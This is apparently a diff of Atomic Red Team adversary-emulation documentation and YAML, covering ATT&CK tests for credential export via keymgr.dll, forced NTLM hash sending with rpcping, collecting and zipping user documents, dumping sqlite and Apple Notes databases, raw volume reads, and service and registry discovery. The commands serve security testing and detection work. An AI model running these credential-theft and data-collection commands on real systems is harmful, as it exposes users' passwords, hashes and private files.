 This test executes the exported function `KRShowKeyMgr` located in `keymgr.dll` using `rundll32.exe`. It opens a window that allows to export stored Windows credentials from the credential manager to a file (`.crd` by default). The file can then be retrieved and imported on an attacker-controlled computer to list the credentials get the passwords. The only limitation is that it requires a CTRL+ALT+DELETE input from the attacker, which can be achieve multiple ways (e.g. a custom implant with remote control capabilities, enabling RDP, etc.).
 Reference: https://twitter.com/0gtweet/status/1415671356239216653

 **Supported Platforms:** Windows

+**auto_generated_guid:** `84113186-ed3c-4d0d-8a3c-8980c86c1f4a`

-**auto_generated_guid:** 84113186-ed3c-4d0d-8a3c-8980c86c1f4a
-
-
-
-
-
-
-#### Attack Commands: Run with `powershell`! 
-
+#### Attack Commands: Run with `powershell`!

 ```powershell
 rundll32.exe keymgr,KRShowKeyMgr
 ```

+### Atomic Test #7: Send NTLM Hash with RPC Test Connection

-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #7 - Send NTLM Hash with RPC Test Connection
 RpcPing command can be used to send an RPC test connection to the target server (-s) and force the NTLM hash to be sent in the process. 
 Ref: https://twitter.com/vysecurity/status/974806438316072960

 **Supported Platforms:** Windows

+**auto_generated_guid:** `0b207037-813c-4444-ac3f-b597cf280a67`

-**auto_generated_guid:** 0b207037-813c-4444-ac3f-b597cf280a67
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | custom_port | Specify the custom port number | integer | 1234|
 | server_ip | Specify the server IP address. If not specified, the loop back IP will be used | string | 127.0.0.1|

-
-#### Attack Commands: Run with `powershell`! 
-
+#### Attack Commands: Run with `powershell`!

 ```powershell
 rpcping -s #{server_ip} -e #{custom_port} -a privacy -u NTLM 1>$Null
 ```

-
-
-
-
-
-<br/>
@@ -1,47 +1,36 @@
 # T1005 - Data from Local System
-## [Description from ATT&CK](https://attack.mitre.org/techniques/T1005)
-<blockquote>

-Adversaries may search local system sources, such as file systems, configuration files, local databases, virtual machine files, or process memory, to find files of interest and sensitive data prior to Exfiltration.
+## Description from ATT&CK

-Adversaries may do this using a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), such as [cmd](https://attack.mitre.org/software/S0106) as well as a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008), which have functionality to interact with the file system to gather information.(Citation: show_run_config_cmd_cisco) Adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) on the local system.
+> Adversaries may search local system sources, such as file systems, configuration files, local databases, virtual machine files, or process memory, to find files of interest and sensitive data prior to Exfiltration.
+> 
+> Adversaries may do this using a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), such as [cmd](https://attack.mitre.org/software/S0106) as well as a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008), which have functionality to interact with the file system to gather information.(Citation: show_run_config_cmd_cisco) Adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) on the local system.

-
-</blockquote>
+[Source](https://attack.mitre.org/techniques/T1005)

 ## Atomic Tests

- [Atomic Test #1 - Search files of interest and save them to a single zip file (Windows)](#atomic-test-1---search-files-of-interest-and-save-them-to-a-single-zip-file-windows)
+- [Atomic Test #1: Search files of interest and save them to a single zip file (Windows)](#atomic-test-1-search-files-of-interest-and-save-them-to-a-single-zip-file-windows)
+- [Atomic Test #2: Find and dump sqlite databases (Linux)](#atomic-test-2-find-and-dump-sqlite-databases-linux)
+- [Atomic Test #3: Copy Apple Notes database files using AppleScript](#atomic-test-3-copy-apple-notes-database-files-using-applescript)

- [Atomic Test #2 - Find and dump sqlite databases (Linux)](#atomic-test-2---find-and-dump-sqlite-databases-linux)
+### Atomic Test #1: Search files of interest and save them to a single zip file (Windows)

- [Atomic Test #3 - Copy Apple Notes database files using AppleScript](#atomic-test-3---copy-apple-notes-database-files-using-applescript)
-
-
-<br/>
-
-## Atomic Test #1 - Search files of interest and save them to a single zip file (Windows)
 This test searches for files of certain extensions and saves them to a single zip file prior to extraction.

 **Supported Platforms:** Windows

+**auto_generated_guid:** `d3d9af44-b8ad-4375-8b0a-4bff4b7e419c`

-**auto_generated_guid:** d3d9af44-b8ad-4375-8b0a-4bff4b7e419c
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | starting_directory | Path to starting directory for the search | Path | C:&#92;Users|
 | output_zip_folder_path | Path to directory for saving the generated zip file | Path | PathToAtomicsFolder&#92;..&#92;ExternalPayloads&#92;T1005|
 | file_extensions | List of file extensions to be searched and zipped, separated by comma and space | string | .doc, .docx, .txt|

-
-#### Attack Commands: Run with `powershell`! 
-
+#### Attack Commands: Run with `powershell`!

 ```powershell
 $startingDirectory = "#{starting_directory}"
@@ -72,38 +61,26 @@ if ($foundFiles.Count -gt 0) {
  }
 ```

-#### Cleanup Commands:
+#### Cleanup Commands
+
 ```powershell
 Remove-Item -Path  $outputZip\data.zip -Force
 ```
+### Atomic Test #2: Find and dump sqlite databases (Linux)

-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - Find and dump sqlite databases (Linux)
 An adversary may know/assume that the user of a system uses sqlite databases which contain interest and sensitive data. In this test we download two databases and a sqlite dump script, then run a find command to find & dump the database content.

 **Supported Platforms:** Linux

+**auto_generated_guid:** `00cbb875-7ae4-4cf1-b638-e543fd825300`

-**auto_generated_guid:** 00cbb875-7ae4-4cf1-b638-e543fd825300
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | remote_url | url of remote payload | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1005/src|

-
-#### Attack Commands: Run with `bash`! 
-
+#### Attack Commands: Run with `bash`!

 ```bash
 cd $HOME
@@ -114,67 +91,55 @@ chmod +x sqlite_dump.sh
 find . ! -executable -exec bash -c 'if [[ "$(head -c 15 {} | strings)" == "SQLite format 3" ]]; then echo "{}"; ./sqlite_dump.sh {}; fi' \;
 ```

-#### Cleanup Commands:
+#### Cleanup Commands
+
 ```bash
 rm -f $HOME/.art
 rm -f $HOME/gta.db
 rm -f $HOME/sqlite_dump.sh
 ```

+#### Dependencies: Run with `bash`!

-
-#### Dependencies:  Run with `bash`!
 ##### Description: Check if running on a Debian based machine.
-##### Check Prereq Commands:
+
+###### Check Prereq Commands
+
 ```bash
 if [ -x "$(command -v sqlite3)" ]; then echo "sqlite3 is installed"; else echo "sqlite3 is NOT installed"; exit 1; fi
 if [ -x "$(command -v curl)" ]; then echo "curl is installed"; else echo "curl is NOT installed"; exit 1; fi
 if [ -x "$(command -v strings)" ]; then echo "strings is installed"; else echo "strings is NOT installed"; exit 1; fi
 ```
-##### Get Prereq Commands:
+
+###### Get Prereq Commands
+
 ```bash
 if grep -iq "debian\|ubuntu\|kali\|mint" /usr/lib/os-release; then apt update && apt install -y binutils curl sqlite3; fi
 if grep -iq "rhel\|fedora\|centos" /usr/lib/os-release; then yum update -y && yum install -y binutils curl sqlite-devel; fi
 ```

+### Atomic Test #3: Copy Apple Notes database files using AppleScript

-
-
-<br/>
-<br/>
-
-## Atomic Test #3 - Copy Apple Notes database files using AppleScript
 This command will copy Apple Notes database files using AppleScript as seen in Atomic Stealer.

 **Supported Platforms:** macOS

+**auto_generated_guid:** `cfb6d400-a269-4c06-a347-6d88d584d5f7`

-**auto_generated_guid:** cfb6d400-a269-4c06-a347-6d88d584d5f7
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | destination_path | Specify the path to copy the database files into. | path | /private/tmp|

-
-#### Attack Commands: Run with `sh`! 
-
+#### Attack Commands: Run with `sh`!

 ```sh
 osascript -e 'tell application "Finder"' -e 'set destinationFolderPath to POSIX file "#{destination_path}"' -e 'set notesFolderPath to (path to home folder as text) & "Library:Group Containers:group.com.apple.notes:"' -e 'set notesFolder to folder notesFolderPath' -e 'set notesFiles to {file "NoteStore.sqlite", file "NoteStore.sqlite-shm", file "NoteStore.sqlite-wal"} of notesFolder' -e 'repeat with aFile in notesFiles' -e 'duplicate aFile to folder destinationFolderPath with replacing' -e 'end' -e 'end tell'
 ```

-#### Cleanup Commands:
+#### Cleanup Commands
+
 ```sh
 rm "#{destination_path}/NoteStore.sqlite*"
 ```
-
-
-
-
-
-<br/>
@@ -1,21 +1,19 @@
 # T1006 - Direct Volume Access
-## [Description from ATT&CK](https://attack.mitre.org/techniques/T1006)
-<blockquote>

-Adversaries may directly access a volume to bypass file access controls and file system monitoring. Windows allows programs to have direct access to logical volumes. Programs with direct access may read and write files directly from the drive by analyzing file system data structures. This technique may bypass Windows file access controls as well as file system monitoring tools. (Citation: Hakobyan 2009)
+## Description from ATT&CK

-Utilities, such as `NinjaCopy`, exist to perform these actions in PowerShell.(Citation: Github PowerSploit Ninjacopy) Adversaries may also use built-in or third-party utilities (such as `vssadmin`, `wbadmin`, and [esentutl](https://attack.mitre.org/software/S0404)) to create shadow copies or backups of data from system volumes.(Citation: LOLBAS Esentutl)
+> Adversaries may directly access a volume to bypass file access controls and file system monitoring. Windows allows programs to have direct access to logical volumes. Programs with direct access may read and write files directly from the drive by analyzing file system data structures. This technique may bypass Windows file access controls as well as file system monitoring tools. (Citation: Hakobyan 2009)
+> 
+> Utilities, such as `NinjaCopy`, exist to perform these actions in PowerShell.(Citation: Github PowerSploit Ninjacopy) Adversaries may also use built-in or third-party utilities (such as `vssadmin`, `wbadmin`, and [esentutl](https://attack.mitre.org/software/S0404)) to create shadow copies or backups of data from system volumes.(Citation: LOLBAS Esentutl)

-</blockquote>
+[Source](https://attack.mitre.org/techniques/T1006)

 ## Atomic Tests

- [Atomic Test #1 - Read volume boot sector via DOS device path (PowerShell)](#atomic-test-1---read-volume-boot-sector-via-dos-device-path-powershell)
+- [Atomic Test #1: Read volume boot sector via DOS device path (PowerShell)](#atomic-test-1-read-volume-boot-sector-via-dos-device-path-powershell)

+### Atomic Test #1: Read volume boot sector via DOS device path (PowerShell)

-<br/>
-
-## Atomic Test #1 - Read volume boot sector via DOS device path (PowerShell)
 This test uses PowerShell to open a handle on the drive volume via the `\\.\` [DOS device path specifier](https://docs.microsoft.com/en-us/dotnet/standard/io/file-path-formats#dos-device-paths) and perform direct access read of the first few bytes of the volume.
 On success, a hex dump of the first 11 bytes of the volume is displayed.

@@ -28,21 +26,15 @@ For a NTFS volume, it should correspond to the following sequence ([NTFS partiti

 **Supported Platforms:** Windows

+**auto_generated_guid:** `88f6327e-51ec-4bbf-b2e8-3fea534eab8b`

-**auto_generated_guid:** 88f6327e-51ec-4bbf-b2e8-3fea534eab8b
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | volume | Drive letter of the volume to access | string | C:|

-
-#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
-
+#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)

 ```powershell
 $buffer = New-Object byte[] 11
@@ -52,9 +44,3 @@ $handle.Close()
 Format-Hex -InputObject $buffer
 ```

-
-
-
-
-
-<br/>
@@ -1,148 +1,167 @@
 # T1007 - System Service Discovery
-## [Description from ATT&CK](https://attack.mitre.org/techniques/T1007)
-<blockquote>

-Adversaries may try to gather information about registered local system services. Adversaries may obtain information about services using tools as well as OS utility commands such as <code>sc query</code>, <code>tasklist /svc</code>, <code>systemctl --type=service</code>, and <code>net start</code>. Adversaries may also gather information about schedule tasks via commands such as `schtasks` on Windows or `crontab -l` on Linux and macOS.(Citation: Elastic Security Labs GOSAR 2024)(Citation: SentinelLabs macOS Malware 2021)(Citation: Splunk Linux Gormir 2024)(Citation: Aquasec Kinsing 2020)
+## Description from ATT&CK

-Adversaries may use the information from [System Service Discovery](https://attack.mitre.org/techniques/T1007) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
+> Adversaries may try to gather information about registered local system services. Adversaries may obtain information about services using tools as well as OS utility commands such as <code>sc query</code>, <code>tasklist /svc</code>, <code>systemctl --type=service</code>, and <code>net start</code>. Adversaries may also gather information about schedule tasks via commands such as `schtasks` on Windows or `crontab -l` on Linux and macOS.(Citation: Elastic Security Labs GOSAR 2024)(Citation: SentinelLabs macOS Malware 2021)(Citation: Splunk Linux Gormir 2024)(Citation: Aquasec Kinsing 2020)
+> 
+> Adversaries may use the information from [System Service Discovery](https://attack.mitre.org/techniques/T1007) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.

-</blockquote>
+[Source](https://attack.mitre.org/techniques/T1007)

 ## Atomic Tests

- [Atomic Test #1 - System Service Discovery](#atomic-test-1---system-service-discovery)
+- [Atomic Test #1: System Service Discovery](#atomic-test-1-system-service-discovery)
+- [Atomic Test #2: System Service Discovery - net.exe](#atomic-test-2-system-service-discovery---netexe)
+- [Atomic Test #3: System Service Discovery - systemctl/service](#atomic-test-3-system-service-discovery---systemctlservice)
+- [Atomic Test #4: Get-Service Execution](#atomic-test-4-get-service-execution)
+- [Atomic Test #5: System Service Discovery - macOS launchctl](#atomic-test-5-system-service-discovery---macos-launchctl)
+- [Atomic Test #6: System Service Discovery - Windows Scheduled Tasks (schtasks)](#atomic-test-6-system-service-discovery---windows-scheduled-tasks-schtasks)
+- [Atomic Test #7: System Service Discovery - Services Registry Enumeration](#atomic-test-7-system-service-discovery---services-registry-enumeration)
+- [Atomic Test #8: System Service Discovery - Linux init scripts](#atomic-test-8-system-service-discovery---linux-init-scripts)

- [Atomic Test #2 - System Service Discovery - net.exe](#atomic-test-2---system-service-discovery---netexe)
+### Atomic Test #1: System Service Discovery

- [Atomic Test #3 - System Service Discovery - systemctl/service](#atomic-test-3---system-service-discovery---systemctlservice)
-
- [Atomic Test #4 - Get-Service Execution](#atomic-test-4---get-service-execution)
-
-
-<br/>
-
-## Atomic Test #1 - System Service Discovery
 Identify system services.

 Upon successful execution, cmd.exe will execute service commands with expected result to stdout.

 **Supported Platforms:** Windows

+**auto_generated_guid:** `89676ba1-b1f8-47ee-b940-2e1a113ebc71`

-**auto_generated_guid:** 89676ba1-b1f8-47ee-b940-2e1a113ebc71
-
-
-
-
-
-
-#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
-
+#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)

 ```cmd
-tasklist.exe
+tasklist.exe /svc
 sc query
 sc query state= all
 ```

+### Atomic Test #2: System Service Discovery - net.exe

-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - System Service Discovery - net.exe
 Enumerates started system services using net.exe and writes them to a file. This technique has been used by multiple threat actors.

 Upon successful execution, net.exe will run from cmd.exe that queries services. Expected output is to a txt file in in the temp directory called service-list.txt.

 **Supported Platforms:** Windows

+**auto_generated_guid:** `5f864a3f-8ce9-45c0-812c-bdf7d8aeacc3`

-**auto_generated_guid:** 5f864a3f-8ce9-45c0-812c-bdf7d8aeacc3
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | output_file | Path of file to hold net.exe output | path | %temp%&#92;service-list.txt|

-
-#### Attack Commands: Run with `command_prompt`! 
-
+#### Attack Commands: Run with `command_prompt`!

 ```cmd
 net.exe start >> #{output_file}
 ```

-#### Cleanup Commands:
+#### Cleanup Commands
+
 ```cmd
 del /f /q /s #{output_file} >nul 2>&1
 ```
+### Atomic Test #3: System Service Discovery - systemctl/service

-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #3 - System Service Discovery - systemctl/service
 Enumerates system service using systemctl/service

 **Supported Platforms:** Linux

+**auto_generated_guid:** `f4b26bce-4c2c-46c0-bcc5-fce062d38bef`

-**auto_generated_guid:** f4b26bce-4c2c-46c0-bcc5-fce062d38bef
-
-
-
-
-
-
-#### Attack Commands: Run with `bash`! 
-
+#### Attack Commands: Run with `bash`!

 ```bash
 if [ "$(uname)" = 'FreeBSD' ]; then service -e; else systemctl --type=service; fi;
 ```

+### Atomic Test #4: Get-Service Execution

-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #4 - Get-Service Execution
 Executes the Get-Service cmdlet to gather objects representing all services on the local system.

 **Supported Platforms:** Windows

+**auto_generated_guid:** `51f17016-d8fa-4360-888a-df4bf92c4a04`

-**auto_generated_guid:** 51f17016-d8fa-4360-888a-df4bf92c4a04
-
-
-
-
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
+#### Attack Commands: Run with `command_prompt`!

 ```cmd
 powershell.exe Get-Service
 ```

+### Atomic Test #5: System Service Discovery - macOS launchctl

+Enumerates services on macOS using launchctl. Used by adversaries for
+identifying daemons, background services, and persistence mechanisms.

+**Supported Platforms:** macOS

+**auto_generated_guid:** `9b378962-a75e-4856-b117-2503d6dcebba`

+#### Attack Commands: Run with `sh`!
+
+```sh
+launchctl list
+```
+
+### Atomic Test #6: System Service Discovery - Windows Scheduled Tasks (schtasks)
+
+Enumerates scheduled tasks on Windows using schtasks.exe.
+
+**Supported Platforms:** Windows
+
+**auto_generated_guid:** `7cd7eaa3-9ccc-460d-96d2-c6fb13e6d58a`
+
+#### Attack Commands: Run with `command_prompt`!
+
+```cmd
+schtasks /query /fo LIST /v
+```
+
+### Atomic Test #7: System Service Discovery - Services Registry Enumeration
+
+Enumerates Windows services by reading the Services registry key
+(HKLM\SYSTEM\CurrentControlSet\Services) instead of using Service Control
+Manager APIs or CLI tools such as sc.exe or Get-Service.
+
+**Supported Platforms:** Windows
+
+**auto_generated_guid:** `d70d82bd-bb00-4837-b146-b40d025551b2`
+
+#### Attack Commands: Run with `powershell`!
+
+```powershell
+Get-ChildItem -Path 'HKLM:\SYSTEM\CurrentControlSet\Services' |
+  ForEach-Object {
+    $p = Get-ItemProperty -Path $_.PSPath -ErrorAction SilentlyContinue
+    [PSCustomObject]@{
+      Name        = $_.PSChildName
+      DisplayName = $p.DisplayName
+      ImagePath   = $p.ImagePath
+      StartType   = $p.Start
+    }
+  }
+```
+
+### Atomic Test #8: System Service Discovery - Linux init scripts
+
+Enumerates system services by listing SysV init scripts and runlevel
+symlinks under /etc/init.d and /etc/rc*.d.
+
+**Supported Platforms:** Linux
+
+**auto_generated_guid:** `8f2a5d2b-4018-46d4-8f3f-0fea53754690`
+
+#### Attack Commands: Run with `sh`!
+
+```sh
+echo "[*] Listing SysV init scripts (/etc/init.d):"
+if [ -d /etc/init.d ]; then ls -l /etc/init.d; else echo "/etc/init.d not present on this system"; fi
+echo
+echo "[*] Listing runlevel directories (/etc/rc*.d):"
+ls -ld /etc/rc*.d 2>/dev/null || echo "No /etc/rc*.d directories found"
+```

-<br/>
@@ -11,7 +11,7 @@ atomic_tests:
  - windows
  executor:
    command: |
-      tasklist.exe
+      tasklist.exe /svc
      sc query
      sc query state= all
    name: command_prompt
@@ -53,3 +53,60 @@ atomic_tests:
  executor:
    name: command_prompt
    command: powershell.exe Get-Service
+- name: System Service Discovery - macOS launchctl
+  auto_generated_guid: 9b378962-a75e-4856-b117-2503d6dcebba
+  description: |
+    Enumerates services on macOS using launchctl. Used by adversaries for
+    identifying daemons, background services, and persistence mechanisms.
+  supported_platforms:
+    - macos
+  executor:
+    name: sh
+    command: launchctl list
+- name: System Service Discovery - Windows Scheduled Tasks (schtasks)
+  auto_generated_guid: 7cd7eaa3-9ccc-460d-96d2-c6fb13e6d58a
+  description: |
+    Enumerates scheduled tasks on Windows using schtasks.exe.
+  supported_platforms:
+  - windows
+  executor:
+    name: command_prompt
+    command: schtasks /query /fo LIST /v
+
+- name: System Service Discovery - Services Registry Enumeration
+  auto_generated_guid: d70d82bd-bb00-4837-b146-b40d025551b2
+  description: |
+    Enumerates Windows services by reading the Services registry key
+    (HKLM\SYSTEM\CurrentControlSet\Services) instead of using Service Control
+    Manager APIs or CLI tools such as sc.exe or Get-Service.
+  supported_platforms:
+  - windows
+  executor:
+    name: powershell
+    command: |
+      Get-ChildItem -Path 'HKLM:\SYSTEM\CurrentControlSet\Services' |
+        ForEach-Object {
+          $p = Get-ItemProperty -Path $_.PSPath -ErrorAction SilentlyContinue
+          [PSCustomObject]@{
+            Name        = $_.PSChildName
+            DisplayName = $p.DisplayName
+            ImagePath   = $p.ImagePath
+            StartType   = $p.Start
+          }
+        }
+
+- name: System Service Discovery - Linux init scripts
+  auto_generated_guid: 8f2a5d2b-4018-46d4-8f3f-0fea53754690
+  description: |
+    Enumerates system services by listing SysV init scripts and runlevel
+    symlinks under /etc/init.d and /etc/rc*.d.
+  supported_platforms:
+  - linux
+  executor:
+    name: sh
+    command: |
+      echo "[*] Listing SysV init scripts (/etc/init.d):"
+      if [ -d /etc/init.d ]; then ls -l /etc/init.d; else echo "/etc/init.d not present on this system"; fi
+      echo
+      echo "[*] Listing runlevel directories (/etc/rc*.d):"
+      ls -ld /etc/rc*.d 2>/dev/null || echo "No /etc/rc*.d directories found"
@@ -1,69 +1,61 @@
 # T1010 - Application Window Discovery
-## [Description from ATT&CK](https://attack.mitre.org/techniques/T1010)
-<blockquote>

-Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used.(Citation: Prevailion DarkWatchman 2021) For example, information about application windows could be used identify potential data to collect as well as identifying security tooling ([Security Software Discovery](https://attack.mitre.org/techniques/T1518/001)) to evade.(Citation: ESET Grandoreiro April 2020)
+## Description from ATT&CK

-Adversaries typically abuse system features for this type of enumeration. For example, they may gather information through native system features such as [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) commands and [Native API](https://attack.mitre.org/techniques/T1106) functions.
+> Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used.(Citation: Prevailion DarkWatchman 2021) For example, information about application windows could be used identify potential data to collect as well as identifying security tooling ([Security Software Discovery](https://attack.mitre.org/techniques/T1518/001)) to evade.(Citation: ESET Grandoreiro April 2020)
+> 
+> Adversaries typically abuse system features for this type of enumeration. For example, they may gather information through native system features such as [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) commands and [Native API](https://attack.mitre.org/techniques/T1106) functions.

-</blockquote>
+[Source](https://attack.mitre.org/techniques/T1010)

 ## Atomic Tests

- [Atomic Test #1 - List Process Main Windows - C# .NET](#atomic-test-1---list-process-main-windows---c-net)
+- [Atomic Test #1: List Process Main Windows - C# .NET](#atomic-test-1-list-process-main-windows---c-net)

+### Atomic Test #1: List Process Main Windows - C# .NET

-<br/>
-
-## Atomic Test #1 - List Process Main Windows - C# .NET
 Compiles and executes C# code to list main window titles associated with each process.

 Upon successful execution, powershell will download the .cs from the Atomic Red Team repo, and cmd.exe will compile and execute T1010.exe. Upon T1010.exe execution, expected output will be via stdout.

 **Supported Platforms:** Windows

+**auto_generated_guid:** `fe94a1c3-3e22-4dc9-9fdf-3a8bdbc10dc4`

-**auto_generated_guid:** fe94a1c3-3e22-4dc9-9fdf-3a8bdbc10dc4
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | input_source_code | Path to source of C# code | path | PathToAtomicsFolder&#92;T1010&#92;src&#92;T1010.cs|
 | output_file_name | Name of output binary | string | %TEMP%&#92;T1010.exe|

-
-#### Attack Commands: Run with `command_prompt`! 
-
+#### Attack Commands: Run with `command_prompt`!

 ```cmd
 C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe -out:#{output_file_name} "#{input_source_code}"
 #{output_file_name}
 ```

-#### Cleanup Commands:
+#### Cleanup Commands
+
 ```cmd
 del /f /q /s #{output_file_name} >nul 2>&1
 ```

+#### Dependencies: Run with `powershell`!

-
-#### Dependencies:  Run with `powershell`!
 ##### Description: T1010.cs must exist on disk at specified location (#{input_source_code})
-##### Check Prereq Commands:
+
+###### Check Prereq Commands
+
 ```powershell
 if (Test-Path "#{input_source_code}") {exit 0} else {exit 1}
 ```
-##### Get Prereq Commands:
+
+###### Get Prereq Commands
+
 ```powershell
 New-Item -Type Directory (split-path "#{input_source_code}") -ErrorAction ignore | Out-Null
 Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1010/src/T1010.cs -OutFile "#{input_source_code}"
 ```

-
-
-
-<br/>
@@ -1,31 +1,24 @@
 # T1012 - Query Registry
-## [Description from ATT&CK](https://attack.mitre.org/techniques/T1012)
-<blockquote>

-Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
+## Description from ATT&CK

-The Registry contains a significant amount of information about the operating system, configuration, software, and security.(Citation: Wikipedia Windows Registry) Information can easily be queried using the [Reg](https://attack.mitre.org/software/S0075) utility, though other means to access the Registry exist. Some of the information may help adversaries to further their operation within a network. Adversaries may use the information from [Query Registry](https://attack.mitre.org/techniques/T1012) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
+> Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
+> 
+> The Registry contains a significant amount of information about the operating system, configuration, software, and security.(Citation: Wikipedia Windows Registry) Information can easily be queried using the [Reg](https://attack.mitre.org/software/S0075) utility, though other means to access the Registry exist. Some of the information may help adversaries to further their operation within a network. Adversaries may use the information from [Query Registry](https://attack.mitre.org/techniques/T1012) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.

-</blockquote>
+[Source](https://attack.mitre.org/techniques/T1012)

 ## Atomic Tests

- [Atomic Test #1 - Query Registry](#atomic-test-1---query-registry)
+- [Atomic Test #1: Query Registry](#atomic-test-1-query-registry)
+- [Atomic Test #2: Query Registry with Powershell cmdlets](#atomic-test-2-query-registry-with-powershell-cmdlets)
+- [Atomic Test #3: Enumerate COM Objects in Registry with Powershell](#atomic-test-3-enumerate-com-objects-in-registry-with-powershell)
+- [Atomic Test #4: Reg query for AlwaysInstallElevated status](#atomic-test-4-reg-query-for-alwaysinstallelevated-status)
+- [Atomic Test #5: Check Software Inventory Logging (SIL) status via Registry](#atomic-test-5-check-software-inventory-logging-sil-status-via-registry)
+- [Atomic Test #6: Inspect SystemStartOptions Value in Registry](#atomic-test-6-inspect-systemstartoptions-value-in-registry)

- [Atomic Test #2 - Query Registry with Powershell cmdlets](#atomic-test-2---query-registry-with-powershell-cmdlets)
+### Atomic Test #1: Query Registry

- [Atomic Test #3 - Enumerate COM Objects in Registry with Powershell](#atomic-test-3---enumerate-com-objects-in-registry-with-powershell)
-
- [Atomic Test #4 - Reg query for AlwaysInstallElevated status](#atomic-test-4---reg-query-for-alwaysinstallelevated-status)
-
- [Atomic Test #5 - Check Software Inventory Logging (SIL) status via Registry](#atomic-test-5---check-software-inventory-logging-sil-status-via-registry)
-
- [Atomic Test #6 - Inspect SystemStartOptions Value in Registry](#atomic-test-6---inspect-systemstartoptions-value-in-registry)
-
-
-<br/>
-
-## Atomic Test #1 - Query Registry
 Query Windows Registry.
 Upon successful execution, cmd.exe will perform multiple reg queries. Some will succeed and others will fail (dependent upon OS).
 References:
@@ -36,16 +29,9 @@ https://www.offensive-security.com/wp-content/uploads/2015/04/wp.Registry_Quick_

 **Supported Platforms:** Windows

+**auto_generated_guid:** `8f7578c4-9863-4d83-875c-a565573bbdf0`

-**auto_generated_guid:** 8f7578c4-9863-4d83-875c-a565573bbdf0
-
-
-
-
-
-
-#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
-
+#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)

 ```cmd
 reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows"
@@ -72,30 +58,16 @@ reg query "HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components"
 reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\Scripts\Startup"
 ```

+### Atomic Test #2: Query Registry with Powershell cmdlets

-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - Query Registry with Powershell cmdlets
 Query Windows Registry with Powershell cmdlets, i.e., Get-Item and Get-ChildItem. The results from above can also be achieved with Get-Item and Get-ChildItem.
 Unlike using "reg query" which then executes reg.exe, using cmdlets won't generate new processes, which may evade detection systems monitoring process generation.

 **Supported Platforms:** Windows

+**auto_generated_guid:** `0434d081-bb32-42ce-bcbb-3548e4f2628f`

-**auto_generated_guid:** 0434d081-bb32-42ce-bcbb-3548e4f2628f
-
-
-
-
-
-
-#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
-
+#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)

 ```powershell
 Get-Item -Path "HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows"
@@ -123,36 +95,23 @@ Get-ChildItem -Path "HKLM:SOFTWARE\Microsoft\Active Setup\Installed Components"
 Get-ChildItem -Path "HKLM:SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\Scripts\Startup"
 ```

+### Atomic Test #3: Enumerate COM Objects in Registry with Powershell

-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #3 - Enumerate COM Objects in Registry with Powershell
 This test is designed to enumerate the COM objects listed in HKCR, then output their methods and CLSIDs to a text file.
 An adversary could then use this information to identify COM objects that might be vulnerable to abuse, such as using them to spawn arbitrary processes. 
 See: https://www.mandiant.com/resources/hunting-com-objects

 **Supported Platforms:** Windows

+**auto_generated_guid:** `0d80d088-a84c-4353-af1a-fc8b439f1564`

-**auto_generated_guid:** 0d80d088-a84c-4353-af1a-fc8b439f1564
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | output_file | File to output list of COM objects to | string | $env:temp&#92;T1592.002Test1.txt|

-
-#### Attack Commands: Run with `powershell`! 
-
+#### Attack Commands: Run with `powershell`!

 ```powershell
 New-PSDrive -PSProvider registry -Root HKEY_CLASSES_ROOT -Name HKCR
